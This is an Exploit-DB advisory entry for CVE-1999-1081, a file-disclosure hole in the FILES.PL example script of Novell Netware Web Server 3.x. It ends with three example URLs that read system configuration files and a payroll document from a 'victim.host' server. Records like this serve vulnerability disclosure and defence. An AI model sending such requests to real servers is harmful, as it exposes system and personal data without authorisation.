Novell Netware Web Server 3.x files.pl Vulnerability

1998-12-01T00:00:00
ID EDB-ID:20482
Type exploitdb
Reporter anonymous
Modified 1998-12-01T00:00:00

Description

Novell Netware Web Server 3.x files.pl Vulnerability. CVE-1999-1081. Remote exploit for novell platform

                                        
                                            source: http://www.securityfocus.com/bid/2076/info

Novell Web Server 3.x Examples Toolkit v.2 is a package containing example scripts and HTML files to help administrators design web sites. It is not a support Novell product and is provided solely as a convenience to the user. The toolkit contained a script called "FILES.PL" that could be used to view the contents of files or directories on the server by a remote attacker. This is done by passing the parameter "file=<file-or-directory-to-view>" to the script. An attacker could gain information useful in conducting subsequent attacks, or retrieve personal or proprietary information. 

http://victim.host/perl/files.pl?file=sys:system/autoexec.ncf
http://victim.host/perl/files.pl?file=sys:etc/ldremote.ncf
http://victim.host/perl/files.pl?file=vol2:apps/accounting/payroll.doc